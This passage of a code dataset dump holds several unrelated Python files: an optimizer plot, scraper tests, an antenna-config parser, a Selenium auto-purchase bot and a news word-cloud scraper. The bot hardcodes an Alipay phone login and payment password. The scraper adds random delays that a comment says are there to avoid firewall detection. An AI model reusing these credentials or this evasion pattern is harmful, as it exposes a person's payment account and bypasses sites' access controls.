grad_descent(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nbench_accel = grad_descent_accel(bench_start, rosenbrock, rosenbrock_grad, iters)[2]\nbench_momentum = grad_descent_momentum(bench_start, rosenbrock, rosenbrock_grad, lr, iters, 0.5)[2]\nbench_nesterov = grad_descent_nesterov(bench_start, rosenbrock, rosenbrock_grad, lr, iters, 0.5)[2]\nbench_adagrad = adagrad(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nbench_rmsprop = rmsprop(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nbench_adadelta = adadelta(bench_start, rosenbrock, rosenbrock_grad, iters)[2]\nbench_adam = adam(bench_start, rosenbrock, rosenbrock_grad, lr, iters)[2]\nxx = np.arange(-20, 20, 0.01)\nyy = np.arange(-20, 20, 0.01)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = rosenbrock((xgrid, ygrid))\nsetup_plot_figure(hline=True, vline=True)\ncont = plt.contourf(xgrid, ygrid, zgrid, 1000, cmap=plt.cm.jet)\nplt.xlim(-20, 20)\nplt.ylim(-15, 15)\nplt.plot(bench_basic.T[0], bench_basic.T[1], 'bo', alpha=0.5, label='Basic')\nplt.plot(bench_accel.T[0], bench_accel.T[1], 'ro', alpha=0.5, label='Accelerated')\nplt.plot(bench_momentum.T[0], bench_momentum.T[1], 'go', alpha=0.5, label='Momentum')\nplt.plot(bench_nesterov.T[0], bench_nesterov.T[1], 'co', alpha=0.5, label='Nesterov')\nplt.plot(bench_adagrad.T[0], bench_adagrad.T[1], 'mo', alpha=0.5, label='Adagrad')\nplt.plot(bench_rmsprop.T[0], bench_rmsprop.T[1], 'yo', alpha=0.5, label='RMSprop')\nplt.plot(bench_adadelta.T[0], bench_adadelta.T[1], 'wo', alpha=0.5, label='Adadelta')\nplt.plot(bench_adam.T[0], bench_adam.T[1], 'ko', alpha=0.5, label='Adam')\nplt.legend()\nplt.show()\n","sub_path":"labs/L1 - Gradient descent and linear models.py","file_name":"L1 - Gradient descent and linear models.py","file_ext":"py","file_size_in_byte":32558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"194937702","text":"import pytest\n\nfrom trading_bot.sources import SmartLab\n\npytestmark = pytest.mark.asyncio\n\n\nasync def test_local_generator():\n sl = SmartLab()\n with open(\"html/test_smartLab.html\", 'r', encoding=\"utf8\") as html_page:\n text = html_page.read()\n sl.update_cache(\"https://smart-lab.ru\", text)\n\n page = await sl.check_update()\n res = (\"+320 (283) [Ситуация на текущий момент](https://clck.ru/EZwKc)\\n\"\n \"\\n\"\n \"+223 (97) [Мост на Сахалин](https://clck.ru/EZwKd)\\n\"\n \"\\n\"\n \"+186 (22) [Три стадии бедности](https://clck.ru/EZwKe)\\n\"\n \"\\n\"\n \"+157 (67) [Какой мост нужен на Сахалин?](https://clck.ru/EZwKf)\\n\"\n \"\\n\"\n \"+150 (27) [Про деньги](https://clck.ru/EZwKg)\\n\"\n \"\\n\"\n \"+150 (23) [Размещение ОФЗ + RGBI + Объём ОФЗ](https://clck.ru/EZwKh)\\n\"\n \"\\n\"\n \"+136 (23) [\\\"Утренний звонок\\\". Биржевой рассказ. Пролог.](https://clck.ru/EZwKj)\\n\"\n \"\\n\"\n \"+115 (32) [Запасы нефти в США: -6,1 мб, добыча: +0 тб/д](https://clck.ru/EZwKk)\\n\"\n \"\\n\"\n \"+104 (61) [Рассказ о моей торговле](https://clck.ru/EZwKn)\\n\"\n \"\\n\"\n \"+101 (0) [Рубль: usdrub - все пристегнулись? ... в 100тыс500 раз?!](https://clck.ru/EZwKo)\")\n\n assert len(page.posts) == 1\n assert page.posts[0].md == res\n","sub_path":"tests/test_smartLab.py","file_name":"test_smartLab.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337790516","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\npython操作excel的三个工具包如下,注意,只能操作.xls,不能操作.xlsx。\nxlrd: 对excel进行读相关操作\nxlwt: 对excel进行写相关操作\nxlutils: 对excel读写操作的整合\n'''\nimport xlrd\nfrom xlutils import copy\nfrom selenium import webdriver\nimport time\n\nGOODS_URL = 'https://www.qianquwan.com/tuan/show_16.html'\nUSER_AGENT = \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\nGOODS_URL4 = 'https://www.qianquwan.com/tuan/show_16.html'#电脑端访问页面\nGOODS_URL5 = 'https://www.qianquwan.com/phone/tuan/show_16.html'#手机端访问页面\n\nncols = [1,3,10]\ni=0#全局已经获取的行数\npath = r'test.xlsx'\nworkbook = xlrd.open_workbook(path)\nnrows_num =workbook.sheet_by_index(0).nrows#获取sheet名为[],获取行数\n\n#获取所有内容\ndef read_all(path):\n global i\n i += 1\n workbook = xlrd.open_workbook(path)\n sheet_name = workbook.sheet_by_index(0)#获取sheet名为[]\n nrows = list(range(0,sheet_name.nrows))#获取行数\n print(nrows)\n customer_name = sheet_name.cell(nrows[i], ncols[0]).value\n customer_phone_number = int(sheet_name.cell(nrows[i],ncols[1]).value)\n customer_order_number = int(sheet_name.cell(nrows[i], ncols[2]).value)\n\n print(i)\n return customer_name,customer_phone_number,customer_order_number\n\ndef successful_write(nows):\n rb = xlrd.open_workbook(path)\n wb = copy.copy(rb)\n # 获取sheet对象,通过sheet_by_index()获取的sheet对象没有write()方法\n ws = wb.get_sheet(0)\n print(ws)\n # 写入数据\n ws.write(nows, 17, '已成功下单')\n wb.save(path)\n\ndef fail_write(nows):\n rb = xlrd.open_workbook(path)\n wb = copy.copy(rb)\n # 获取sheet对象,通过sheet_by_index()获取的sheet对象没有write()方法\n ws = wb.get_sheet(0)\n print(ws)\n # 写入数据\n ws.write(nows, 17, '下单失败')\n wb.save(path)\n\ndef auto_buy():\n #打开第一个购买页面\n driver = webdriver.Firefox()\n driver.get(GOODS_URL5)\n time.sleep(2)\n driver.find_element_by_link_text('立即抢购').click()\n time.sleep(5)\n\n #跳转到第二个页面,填入购买人信息\n customer_name,customer_phone_number,customer_order_number=read_all(path)\n for k in range(1,customer_order_number):\n print(k)\n driver.find_element_by_xpath('//a[@class=\"add-btn\"]').click()\n print(customer_order_number)\n driver.find_element_by_name('linkman').send_keys(customer_name)\n print(customer_name)\n driver.find_element_by_name('linktel').send_keys(customer_phone_number)\n print(customer_phone_number)\n try:\n driver.find_element_by_name('checkcode').send_keys(input('code'))\n except:\n print('没有找到电脑端的验证码')\n try:\n driver.find_elements_by_class_name('tj-btn')[0].click()\n except:\n print('没有找到电脑端的购买链接')\n try:\n driver.find_elements_by_class_name('now-booking-btn')[0].click()\n except:\n print('没有找到手机端的购买链接')\n time.sleep(1)\n\n #第三个页面支付方式的选择\n try:\n driver.find_element_by_xpath('//li[@data=\"11\"]').click()\n driver.find_element_by_id('st-payment-submit').click()\n except :\n print('无法匹配')\n\n #等待第四个页面的加载,支付页面\n time.sleep(8)\n driver.switch_to.window(driver.window_handles[1])\n driver.switch_to.window(driver.window_handles[1])\n\n try:\n driver.find_element_by_name('loginId').send_keys('18940046576')\n except:\n print('无法输入用户名')\n try:\n driver.find_element_by_id('payPasswd_rsainput').send_keys('199411')\n except:\n print('无法输入密码')\n try:\n driver.find_element_by_xpath('//a[@data-defaulttext=\"下一步\"]').click()\n # driver.find_element_by_class_name('newBtn-blue newBtn-long').click()\n except:\n print('无法提交支付宝订单')\n time.sleep(2)\n j=1\n while True:\n j+=1\n try:\n driver.find_element_by_id('payPasswd_rsainput').send_keys('199411')\n except:\n print('无法输入密码')\n # try:\n # checkCode = driver.find_element_by_name('checkCode').send_keys('yuan')#随机输入验证码\n # driver.find_element_by_xpath('//a[@data-defaulttext=\"下一步\"]').click()\n # except:\n # print(\"driver.find_element_by_name('checkCode')\")\n try:\n checkCode= driver.find_element_by_xpath('//input[@name=\"checkCode\"]')\n checkCode.send_keys(input('请输入验证码3'))\n driver.find_element_by_xpath('//a[@data-defaulttext=\"下一步\"]').click()\n break\n except:\n print(\"driver.find_element_by_xpath('//input[@name='checkCode']')\")\n if j>5:\n break\n\n time.sleep(5)\n try:\n driver.find_element_by_class_name('sixDigitPassword').send_keys('199411')\n except:\n print(input('请输入密码>>>:'))\n try:\n driver.find_element_by_id('J_authSubmit').click()\n print('sucessful')\n successful_write(i)\n except:\n fail_write(i)\n driver.quit()\n\n\n\nif __name__=='__main__':\n for num in range(1, nrows_num):\n auto_buy()\n\n\n","sub_path":"auto_buy.py","file_name":"auto_buy.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"327733353","text":"\"\"\"\n以 Unix 风格给出一个文件的绝对路径,你需要简化它。或者换句话说,将其转换为规范路径。\n\n在 Unix 风格的文件系统中,一个点(.)表示当前目录本身;此外,两个点 (..) 表示将目录切换到上一级(指向父目录);两者都可以是复杂相对路径的组成部分。更多信息请参阅:Linux / Unix中的绝对路径 vs 相对路径\n\n请注意,返回的规范路径必须始终以斜杠 / 开头,并且两个目录名之间必须只有一个斜杠 /。最后一个目录名(如果存在)不能以 / 结尾。此外,规范路径必须是表示绝对路径的最短字符串。\n\n \n\n示例 1:\n\n输入:\"/home/\"\n输出:\"/home\"\n解释:注意,最后一个目录名后面没有斜杠。\n示例 2:\n\n输入:\"/../\"\n输出:\"/\"\n解释:从根目录向上一级是不可行的,因为根是你可以到达的最高级。\n示例 3:\n\n输入:\"/home//foo/\"\n输出:\"/home/foo\"\n解释:在规范路径中,多个连续斜杠需要用一个斜杠替换。\n示例 4:\n\n输入:\"/a/./b/../../c/\"\n输出:\"/c\"\n示例 5:\n\n输入:\"/a/../../b/../c//.//\"\n输出:\"/c\"\n示例 6:\n\n输入:\"/a//b////c/d//././/..\"\n输出:\"/a/b/c\"\n通过次数57,980提交次数141,935\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/simplify-path\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\ndef simplifyPath(path: str) -> str:\n paths = path.split('/')\n paths = list(filter(lambda x: x != '' and x != '.', paths))\n i, stack = 0, []\n while i < len(paths):\n cur = paths[i]\n if cur == '..' and len(stack) > 0:\n stack.pop()\n else:\n stack.append(cur)\n i += 1\n\n start = 0\n while start < len(stack) and stack[start] == '..':\n start += 1\n\n return '/' + '/'.join(stack[start:])\n\n\nif __name__ == '__main__':\n print(simplifyPath(\"/home/../..\"))\n","sub_path":"71_simplifyPath.py","file_name":"71_simplifyPath.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"650170651","text":"#!/usr/bin/env python\n\"\"\"A module to read LOFAR antenna field files.\nThe ROTATION_MATRIX field is the rotation matrix of the station;\nit maps the the local station coordinates to the ITRF coordinates\nsuch that\n\n r_ITRF = ROTATION_MATRIX * r_stn where r are 3-element column vectors.\n\"\"\"\n\nimport sys\nimport numpy as np\nimport os\nfrom os.path import dirname\nimport argparse\n\n__version__ = 0.1\nSTATICMETADATA = os.path.join(dirname(__file__),'share/StaticMetaData/')\nANTENNAFIELDDIR = STATICMETADATA\nIHBADELTASDIR = os.path.join(dirname(__file__),'share/iHBADeltas/')\nIHBADELTASDIR = STATICMETADATA\nCOMMENT_CHAR = '#'\nAFfileNameType = 3\n\n\ndef _getAntennaFieldFile(stationName):\n antenna_field_dir = ANTENNAFIELDDIR\n if AFfileNameType==2 or AFfileNameType==3:\n basename = stationName+'-'+'AntennaField'+'.conf'\n else:\n basename='AntennaField'+stationName+'.conf'\n filepath = os.path.join(antenna_field_dir, basename)\n return filepath\n\n\ndef _getiHBADeltafile(stationName):\n \"\"\"Get file path to iHBADelta for given stationName. \"\"\"\n basename = stationName+'-'+'iHBADeltas'+'.conf'\n filepath = os.path.join(IHBADELTASDIR, basename)\n return filepath\n\n\ndef parseAntennaField(stationName):\n filepath = _getAntennaFieldFile(stationName)\n return parseAntennaFieldFile(filepath)\n\n\ndef parseAntennaFieldFile(filename, AFfileNameType=3):\n \"\"\"Parse LOFAR AntennaField file by name and return data as a dict.\n Note that this reads in both LBA and HBA parameters.\n \"\"\"\n AntFldData={'LBA': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[],'REL_POS':[]},\n 'HBA': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[],'REL_POS':[]},\n 'HBA0': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[]},\n 'HBA1': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[]}\n }\n \n try:\n f = open(filename)\n except IOError:\n print(\"Error: \"+filename+\" does not exist.\")\n raise\n line = f.readline()\n while line:\n if COMMENT_CHAR in line:\n line, comment = line.split(COMMENT_CHAR, 1)\n if \"HBA0\" in line:\n AntBand = \"HBA0\"\n elif \"HBA1\" in line:\n AntBand = \"HBA1\"\n elif \"HBA\" in line:\n AntBand = \"HBA\"\n elif \"LBA\" in line:\n AntBand = \"LBA\"\n else:\n line=f.readline()\n continue\n where, rest = line.split(AntBand, 1)\n where = where.strip()\n if where == '':\n # Read absolute position of station origin\n line = f.readline()\n elementposshape, elementposLine = line.split(' ',1)\n elementposLine = elementposLine.strip('[] \\n').split()\n position = [float(v) for v in elementposLine]\n AntFldData[AntBand]['POSITION'] = position\n if AntBand != \"HBA0\" and AntBand != \"HBA1\":\n # Read relative position of each element\n line = f.readline()\n dimstr,rest = line.split('[',1)\n shp = dimstr.split('x')\n if shp[0][0] == '(':\n (idxbeg,idxend) = shp[0].strip('() ').split(',')\n nrrows = int(idxend)+1\n else:\n nrrows = int(shp[0])\n for elementNr in range(0,nrrows):\n line = f.readline()\n vals = line.split()\n posxpol = [float(v) for v in vals[0:3]]\n posypol = [float(v) for v in vals[3:6]]\n AntFldData[AntBand]['REL_POS'].append(posxpol) \n # Note: Skip ypol as it is identical to xpol\n # Read ending ']' line\n line=f.readline()\n elif where == 'NORMAL_VECTOR':\n line = f.readline()\n elementposshape, elementposLine = line.split(' ',1)\n elementposLine = elementposLine.strip('[] \\n').split()\n nrmv = [float(v) for v in elementposLine]\n AntFldData[AntBand][where]=nrmv\n elif where == 'ROTATION_MATRIX':\n line = f.readline()\n elementposshape, elementposLine = line.split(' ',1)\n elementposLine = elementposLine.strip('[] \\n').split()\n elementposLine = line.split()\n dimstr, rest = line.split('[',1)\n shp = dimstr.split('x')\n for xyz in range(3):\n line = f.readline()\n rowstr = line.split()\n row = [float(v) for v in rowstr]\n AntFldData[AntBand][where].append(row)\n # Read ending ']' line\n line = f.readline()\n line = f.readline()\n return AntFldData\n\n\ndef parseiHBADeltasfile(stationName):\n \"\"\"Parse iHBADelta file.\"\"\"\n iHBADeltasdata = []\n filepath = _getiHBADeltafile(stationName)\n f = open(filepath)\n line=f.readline()\n while line:\n if COMMENT_CHAR in line:\n line, comment = line.split(COMMENT_CHAR, 1)\n if \"HBADeltas\" in line:\n HBADeltaLine = True\n break\n else:\n line=f.readline()\n continue\n if HBADeltaLine:\n line = f.readline()\n nrelems, nrdims = line.strip().rstrip('[').split('x')\n if nrelems[0] == '(':\n nrelems = int(nrelems.strip('() ').split(',')[1])+1\n nrdims = int(nrdims.strip('() ').split(',')[1])+1\n else:\n nrelems, nrdims = int(nrelems), int(nrdims)\n for elemnr in range(nrelems):\n line = f.readline()\n xpos, ypos, zpos = line.lstrip().split()\n iHBADeltasdata.append([float(xpos), float(ypos), float(zpos)])\n #elempos[elemnr,0], elempos[elemnr,1], elempos[elemnr,2] =\\\n # float(xpos), float(ypos), float(zpos)\n else:\n raise RuntimeError(\"Error: iHBADeltas file is corrupt.\")\n return iHBADeltasdata\n\n\ndef getHBAsepton(stnName, HBAsingleelems):\n \"\"\"Get configuration parameters for an HBA station in SEPTON mode. SEPTON\n stands for single element per tile ON. In this mode the HBA can be seen as\n an instantenously omni-directional interferometer capable of producing\n allsky snapshots.\n \"\"\"\n stnPos, stnRot, stnRelPos, stnIntilePos = getArrayBandParams(stnName, 'HBA')\n nrtiles = len(HBAsingleelems)\n relpospertile = np.zeros((nrtiles,3))\n for tilenr in range(nrtiles):\n relpospertile[tilenr] = stnIntilePos[HBAsingleelems[tilenr]]\n stnRelPos += relpospertile\n return stnPos, stnRot, stnRelPos\n\n\ndef getArrayBandParams(stnid, arrband):\n \"\"\"Get configuration parameters for an array band of the station.\n Array band can be HBA or LBA.\n \n Note: Core stations (CS) antenna field files specify rotation and normal\n vector for HBA0 & HBA1 subarrays while their relative positions\n are given specified as HBA.\n Note: Normal vector can be obtain from last column in rotation matrix.\n \"\"\"\n antfld = parseAntennaField(stnid)\n stnLoc = stnid[0:2]\n errmess = \"Array band not valid. Only 'LBA', 'HBA' are valid, \"\\\n + \"except for 'CS' stations for which 'HBA0', 'HBA1' are also valid.\"\n if arrband == 'LBA':\n subarr = 'LBA'\n hbadeltas = [0.,0.,0.]\n elif arrband.startswith('HBA'):\n # Set subarr appropriately\n if stnLoc == 'CS':\n if arrband == 'HBA0' or arrband == 'HBA1':\n subarr = arrband\n elif arrband == 'HBA':\n # Arbitrarily choose HBA0 (HBA1 could also be used)\n subarr = 'HBA0' \n elif arrband == 'HBA':\n subarr = arrband\n else:\n raise ValueError(errmess)\n arrband = 'HBA'\n hbadeltas = parseiHBADeltasfile(stnid)\n else:\n raise ValueError(errmess)\n # Use matrices in order to facilitate coord transformation.\n # axis=0\n stnpos = np.matrix(antfld[arrband]['POSITION']).T\n stnrot = np.matrix(antfld[subarr]['ROTATION_MATRIX'])\n stnrelpos = np.matrix(antfld[arrband]['REL_POS'])\n stnintilepos = np.matrix(hbadeltas)\n return stnpos, stnrot, stnrelpos, stnintilepos\n\n\ndef printantennafieldfile():\n parser = argparse.ArgumentParser()\n #parser.add_argument(\"antenna_field_file\")\n parser.add_argument(\"stnid\")\n args = parser.parse_args()\n AFD = parseAntennaField(args.stnid)\n print(AFD)\n\n\ndef list_stations(antenna_field_dir=ANTENNAFIELDDIR):\n \"\"\"List all the available LOFAR station-ids.\n \"\"\"\n dirlist = os.listdir(antenna_field_dir)\n stnId_list = []\n for f in dirlist:\n splitres = f.split(\"-AntennaField.conf\")\n if len(splitres) == 2 and splitres[1] == '':\n stnId = splitres[0]\n stnId_list.append(stnId)\n return stnId_list\n\n\ndef main():\n stnId_list = list_stations()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"stnid\", help='Choose a station: {}'.format(','.join(stnId_list)))\n parser.add_argument(\"bandarr\", help='Choose HBA or LBA')\n args = parser.parse_args()\n stnpos, stnrot, stnrelpos, stnintilepos = \\\n getArrayBandParams(args.stnid, args.bandarr)\n print(\"Position:\\n{}\".format(stnpos))\n print(\"Rotation:\\n{}\".format(stnrot))\n print(\"Relative positions:\\n{}\".format(stnrelpos))\n print(\"In-tile positions:\\n{}\".format(stnintilepos))\n\n\nif __name__ == '__main__':\n #main()\n printantennafieldfile()\n\n","sub_path":"ilisa/antennameta/antennafieldlib.py","file_name":"antennafieldlib.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"540690496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nBasic idea of the program:\n 1. Grab a few webpages from sina and extract the news subjects\n 2. Segment words using Python the package jieba\n 2.1 Filter out the stop words\n 2.2 Only keep nouns\n 3. Load all the words(with some appearing multiple times) into the package wordcloud\n 4. That's it!\n\n@author: Dazhuang\n\n\n安装 Wordcloud 遇到问题。在下面的连接直接下载 whl 安装 问题搞定\nhttps://www.lfd.uci.edu/~gohlke/pythonlibs/#wordcloud \n注意运行 路径。因为需要加载 stopwords.txt\n\t \n\"\"\"\nimport jieba\nimport jieba.posseg as pseg\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os import path\nimport pandas as pd\nimport re\nimport requests\nfrom scipy.misc import imread\nimport scipy\nimport time\nfrom wordcloud import WordCloud\nimport random\n\ndef fetch_sina_news():\n '''\n 从列表页 下载新浪新闻 ,MAX_PAGE_NUM 最大页数\n 利用正则 获得所有新闻标题,并写入文件 subjects.txt\n '''\n PATTERN = re.compile('.shtml\" target=\"_blank\">(.*?)(.*)')\n BASE_URL = \"http://roll.news.sina.com.cn/news/gnxw/gdxw1/index_\"\n #BASE_URL = 'http://roll.news.sina.com.cn/news/gjxw/gjmtjj/index_' # 国际新闻\n #BASE_URL = 'http://roll.news.sina.com.cn/news/shxw/zqsk/index_' # 社会新闻\n MAX_PAGE_NUM = 16\n\n with open('subjects.txt','w',encoding='utf-8') as f: # 用with 开启,保证文件最后关闭\n for i in range(1, MAX_PAGE_NUM): # 循环从1-最大夜码\n print('Downloading page #{}'.format(i))\n r = requests.get(BASE_URL + str(i)+'.shtml') # requests.get 获得 网页数据\n r.encoding='gb2312' # r response\n data = r.text # r.text 纯文本反馈\n p = re.findall(PATTERN, data) # 利用正则获得 list\n for s in p:\n f.write(s[0]) # 把文章标题 写入文件\n time.sleep(random.randint(5,10)) # 修改5-10秒 避免被 防火墙发现\n \ndef extract_words():\n \n with open('subjects.txt','r',encoding='utf-8') as f: # 打开标题列表文件\n news_subjects = f.readlines() # 写入的时候没有换行,因此只有一行\n \n stop_words = set(line.strip() for line in open('stopwords.txt', encoding='utf-8'))\n # 生成 停用词列表,然后用 set 去除重复\n newslist = [] # newslist 用来保存 去除停用词的 list\n \n for subject in news_subjects:\n if subject.isspace():\n continue\n \n # segment words line by line\n word_list = pseg.cut(subject) # (重要)利用 结巴分词 对内容进行分词 word_list 是一个生成器 generator\n for word, flag in word_list: # 迭代 word_list 获得每个元素是 jieba.posseg.pair pair('word', 'nr') 前面是词,后面是词性\n if not word in stop_words and flag == 'n': # 判断 停用词\n newslist.append(word) # 构建 新的 词汇表(去除了停用词)\n \n d = path.dirname(__file__) \n mask_image = imread(path.join(d, \"mickey.png\")) # mask_image 是 numpy.ndarray\n\n content = ' '.join(newslist) # 把 词表 用空格连起来\n wordcloud = WordCloud(font_path='simhei.ttf', background_color=\"grey\", mask=mask_image, max_words=40).generate(content)\n # 词云 参考:http://blog.csdn.net/fontthrone/article/details/72775865\n \n # Display the generated image:\n plt.imshow(wordcloud)\n plt.axis(\"off\") # 去掉坐标轴\n wordcloud.to_file('wordcloud.jpg')\n plt.show()\n \nif __name__ == \"__main__\":\n fetch_sina_news()\n extract_words()\n","sub_path":"Data Processing/4.2/sinanews/news_title_mining.py","file_name":"news_title_mining.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220706809","text":"# Imported Python Transfer Function\n#\nimport sensor_msgs.msg\nimport hbp_nrp_cle.tf_framework.tf_lib\n@nrp.MapRobotSubscriber(\"camera_left\", Topic('/mouse/mouse_left_eye/mouse/left_eye', sensor_msgs.msg.Image))\n@nrp.MapRobotSubscriber(\"camera_right\", Topic('/mouse/mouse_right_eye/mouse/right_eye', sensor_msgs.msg.Image))\n@nrp.MapSpikeSource(\"red_left_eye\", nrp.brain.sensors[0], nrp.poisson)\n@nrp.MapSpikeSource(\"red_right_eye\", nrp.brain.sensors[1], nrp.poisson)\n@nrp.Robot2Neuron()\ndef eye_sensor_transmit_right(t, camera_right, camera_left, red_left_eye, red_right_eye):\n image_results_left = hbp_nrp_cle.tf_framework.tf_lib.detect_red(image=camera_left.value)\n image_results_right = hbp_nrp_cle.tf_framework.tf_lib.detect_red(image=camera_right.value)\n red_right_eye.rate = 500.0 * (image_results_left.right+image_results_right.right)\n red_left_eye.rate = 500.0 * (image_results_left.left+image_results_right.left)\n#\n\n","sub_path":"braitenberg_mouse_lab/eye_sensor_transmit_right.py","file_name":"eye_sensor_transmit_right.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"618558575","text":"#-*- coding: utf-8 -*-\nimport os\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nfrom datetime import datetime\nimport itertools\n\n# be sure to share the doc with your Google APIs address\nDOC_URL = 'https://docs.google.com/spreadsheets/d/1yXpEm40A_Gvg-qpHQGP-3lj0I9ZbNI-NqCcHVOMC1OM/edit#gid=0'\n# downloaded from Google Developers Console\nGOOGLE_AUTH = 'google_auth.json'\n\nif __name__ == '__main__':\n scope = ['https://spreadsheets.google.com/feeds']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(GOOGLE_AUTH, scope)\n gc = gspread.authorize(credentials)\n sh = gc.open_by_url(DOC_URL)\n\n wks = sh.get_worksheet(len(sh.worksheets()) - 1)\n most_recent_values = None\n if wks is not None:\n most_recent_values = sorted(wks.col_values(1))\n\n path = os.path.expanduser('~/Music/iTunes/iTunes Media/Music/Unknown Artist/Unknown Album')\n current = sorted(map(lambda x: ([x.decode('utf8')[:-4]]), os.listdir(path)))\n\n if list(itertools.chain(*current)) != most_recent_values:\n date_string = datetime.now().strftime('%d %B, %Y')\n if date_string == wks.title:\n sh.del_worksheet(wks)\n wks = sh.add_worksheet(title=date_string, rows='1', cols='1')\n map(lambda x: wks.insert_row(x), current)\n\n","sub_path":"pub_music.py","file_name":"pub_music.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"121805937","text":"from __future__ import unicode_literals\n\nfrom django.db.backends.postgresql_psycopg2.operations import DatabaseOperations as BaseDatabaseOperations\n\n\nclass DatabaseOperations(BaseDatabaseOperations):\n def last_insert_id(self, cursor, table_name, pk_name):\n # Use pg_get_serial_sequence to get the underlying sequence name\n # from the table name and column name (available since PostgreSQL 8)\n cursor.execute(\"SELECT MAX(%s) FROM %s\" % (\n pk_name, self.quote_name(table_name)))\n return cursor.fetchone()[0]\n","sub_path":"django-redshift/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"49287231","text":"# -*- coding: utf-8 -*-\n\"\"\"!weather return the 5-day forecast\"\"\"\n\ntry:\n from urllib import quote\nexcept ImportError:\n from urllib.request import quote\nimport json\nimport logging\nimport os\nimport re\nimport time\n\nimport requests\n\n# https://developer.yahoo.com/weather/documentation.html\nICONMAP = {\n \"0\": \":tornado:\",\n \"1\": \":cyclone:\",\n \"2\": \":cyclone:\",\n \"3\": \":thunder_cloud_and_rain:\",\n \"4\": \":thunder_cloud_and_rain:\",\n \"5\": \":snowflake:\",\n \"6\": \":snowflake:\",\n \"7\": \":snowflake:\",\n \"8\": \":snowflake:\",\n \"9\": \":rain_cloud:\",\n \"10\": \":snowflake:\",\n \"11\": \":rain_cloud:\",\n \"12\": \":rain_cloud:\",\n \"13\": \":snowflake\",\n \"14\": \":snowflake:\",\n \"15\": \":snowflake:\",\n \"16\": \":snowflake:\",\n \"17\": \":thunder_cloud_and_rain:\",\n \"18\": \":rain_cloud:\",\n \"19\": \":desert:\",\n \"20\": \":cloud:\",\n \"21\": \":cloud:\",\n \"22\": \":smoking:\",\n \"23\": \":wind_blowing_face:\",\n \"24\": \":wind_blowing_face:\",\n \"25\": \":snowman_without_snow:\",\n \"26\": \":cloud:\",\n \"27\": \":sun_behind_cloud:\",\n \"28\": \":sun_behind_cloud:\",\n \"29\": \":sun_small_cloud:\",\n \"30\": \":sun_small_cloud:\",\n \"32\": \":sunny:\",\n \"33\": \":sunny:\",\n \"34\": \":sunny:\",\n \"35\": \":thunder_cloud_and_rain:\",\n \"36\": \":sunny:\",\n \"37\": \":thunder_cloud_and_rain:\",\n \"38\": \":thunder_cloud_and_rain:\",\n \"39\": \":thunder_cloud_and_rain:\",\n \"40\": \":rain_cloud:\",\n \"41\": \":snowflake:\",\n \"42\": \":snowflake:\",\n \"43\": \":snowflake:\",\n \"44\": \":partly_sunny:\",\n \"45\": \":thunder_cloud_and_rain:\",\n \"46\": \":snowflake:\",\n \"47\": \":thunder_cloud_and_rain:\",\n}\n\nclass WeatherException(Exception):\n \"\"\"An exception finding the weather\"\"\"\n pass\n\ndef weather(searchterm):\n \"\"\"Get the weather for a place given by searchterm\n\n Returns a title and a list of forecasts.\n\n The title describes the location for the forecast (i.e. \"Portland, ME USA\")\n The list of forecasts is a list of dictionaries in slack attachment fields\n format (see https://api.slack.com/docs/message-attachments)\n\n Throws WeatherException if the location given by `searchterm` can't be\n found.\n \"\"\"\n yql = u'select * from weather.forecast where woeid in '\\\n '(select woeid from geo.places(1) where text=\"{}\")'.format(\n searchterm)\n\n unit = \"c\" if os.environ.get(\"WEATHER_CELSIUS\") else \"f\"\n if unit == \"c\":\n yql += u' AND u=\"c\"'\n\n url = 'https://query.yahooapis.com/v1/public/yql?'\\\n 'q={}&format=json'.format(quote(yql.encode('utf8')))\n\n dat = requests.get(url).json()\n if 'query' not in dat or not dat['query']['results']:\n logging.warning('weather response missing fields. response: %s', dat)\n raise WeatherException(\":crying_cat_face: Sorry, weather request failed\"\n \":crying_cat_face:\")\n\n forecast = dat['query']['results']['channel']['item']['forecast']\n location = dat['query']['results']['channel']['location']\n\n region = location['region'].strip()\n if region == location[\"city\"].strip():\n region = \"\"\n else:\n region = \"{} \".format(region)\n\n title = \"Weather for {}, {}{}: \".format(\n location[\"city\"], region, location['country'])\n\n forecasts = []\n for day in forecast:\n day_of_wk = time.strftime(\"%A\", time.strptime(day[\"date\"], \"%d %b %Y\"))\n icon = ICONMAP.get(day[\"code\"], \":question:\")\n 